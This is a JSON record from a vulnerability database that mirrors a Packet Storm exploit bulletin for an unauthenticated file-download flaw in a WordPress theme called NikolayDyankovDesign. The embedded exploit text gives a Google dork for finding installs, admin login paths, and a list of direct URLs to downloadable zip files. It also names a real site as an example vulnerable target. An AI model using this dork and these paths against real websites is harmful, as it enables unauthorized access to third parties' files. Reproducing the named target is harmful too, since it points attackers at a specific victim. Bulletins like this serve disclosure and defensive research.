{"id": "PACKETSTORM:150700", "bulletinFamily": "exploit", "title": "WordPress NikolayDyankovDesign 2.0 Arbitrary File Disclosure", "description": "", "published": "2018-12-10T00:00:00", "modified": "2018-12-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/150700/WordPress-NikolayDyankovDesign-2.0-Arbitrary-File-Disclosure.html", "reporter": "KingSkrupellos", "references": [], "cvelist": [], "type": "packetstorm", "lastseen": "2018-12-11T10:31:04", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "82154edb2667a7bab008b46153e7a76d"}, {"key": "modified", "hash": "00508468a8679345d59d4b986030111e"}, {"key": "published", "hash": "00508468a8679345d59d4b986030111e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8ed984a4d485209441d19067b287e49e"}, {"key": "sourceData", "hash": "465508c8bf407e43c871ae845425f668"}, {"key": "sourceHref", "hash": "d5f8bdf43a855fc704c6dcd50e821f2e"}, {"key": "title", "hash": "fa41f33d0ac7dea31dc24594e9efa99b"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "hash": "9a018a2b0b89ec38e1f1ac3be112c83938dc03e116e720abf196440ae233bce1", "viewCount": 4, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2018-12-11T10:31:04"}, "dependencies": {"references": [], "modified": "2018-12-11T10:31:04"}, "vulnersScore": 5.8}, "objectVersion": "1.3", "sourceHref": "https://packetstormsecurity.com/files/download/150700/wpnddt20-disclose.txt", "sourceData": "`################################################################################################# \n \n# Exploit Title : WordPress NikolayDyankovDesign Themes 2.0 Arbitrary File \nDownload \n# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security \nArmy \n# Date : 08/12/2018 \n# Vendor Homepage : pinterest.com/nikolaydyankov/ ~ nikolaydyankovdesign.com \n~ semsoft.ca \n# Software Download Link : N/A \n# Tested On : Windows and Linux \n# Category : WebApps \n# Version Information : 1.0 and 2.0 \n# Exploit Risk : Medium \n# Google Dorks : inurl:''/wp-content/themes/nikolaydyankovdesign/'' \n# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access \nControls ] \nCWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] \n \n################################################################################################# \n \n# Admin Panel Login Path : \n \n/demox/admin/ \n/wp-log \n \n# Exploit : \n \n/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip \n \n/wp-content/themes/nikolaydyankovdesign/documentations/flipper-for-wordpress-2-0.zip \n \n/wp-content/themes/nikolaydyankovdesign/documentations/flipper.zip \n \n/wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map-for-wordpress.zip \n \n/wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map.zip \n \n/wp-content/themes/nikolaydyankovdesign/documentations/timeliner-for-wordpress.zip \n \n/wp-content/themes/nikolaydyankovdesign/documentations/timelinexml.zip \n \n/wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline-for-wordpress.zip \n \n/wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline.zip \n \n################################################################################################# \n \n# Example Vulnerable Site => \n \n[+] \nphotobook.com.tr/demox/siparis/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip \n \n################################################################################################# \n \n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team \n \n################################################################################################# \n`\n"}

{}